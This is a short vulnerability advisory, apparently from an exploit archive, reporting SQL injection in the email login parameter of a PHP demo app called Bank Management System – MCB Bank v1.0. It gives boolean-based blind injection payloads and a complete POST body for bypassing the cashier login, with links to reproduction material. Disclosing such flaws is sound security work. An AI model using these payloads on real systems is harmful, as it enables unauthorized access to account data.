Bank Management System 1.0 SQL Injection

# Title: Bank Management System – MCB Bank v1.0 – SQLi
# Author: nu11secur1ty
# Date: 02.25.2022
# Vendor: https://www.campcodes.com/projects/php/ by:Tariq Fareeds
# Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System

## Description:
The email parameter from Bank Management System – MCB Bank v1.0
appears to be vulnerable to SQL injection attacks.
The payloads 30735302′ or 9098=9098– and 41995976′ or 3071=3078–
were each submitted in the email parameter.
These two requests resulted in different responses, indicating that
the input is being incorporated into a SQL query in an unsafe way
WARNING: If this is in some external domain, or some subdomain
redirection, or internal whatever, this will be extremely dangerous!
Status: CRITICAL

[+] Payloads:

“`mysql
—
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause
Payload: email=-9337′ OR 4870=4870– Cgzq&password=q7A!t8j!H2&cashierLogin=
—

“`
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System)

## Proof and Exploit:
[href](https://streamable.com/hvaaiu)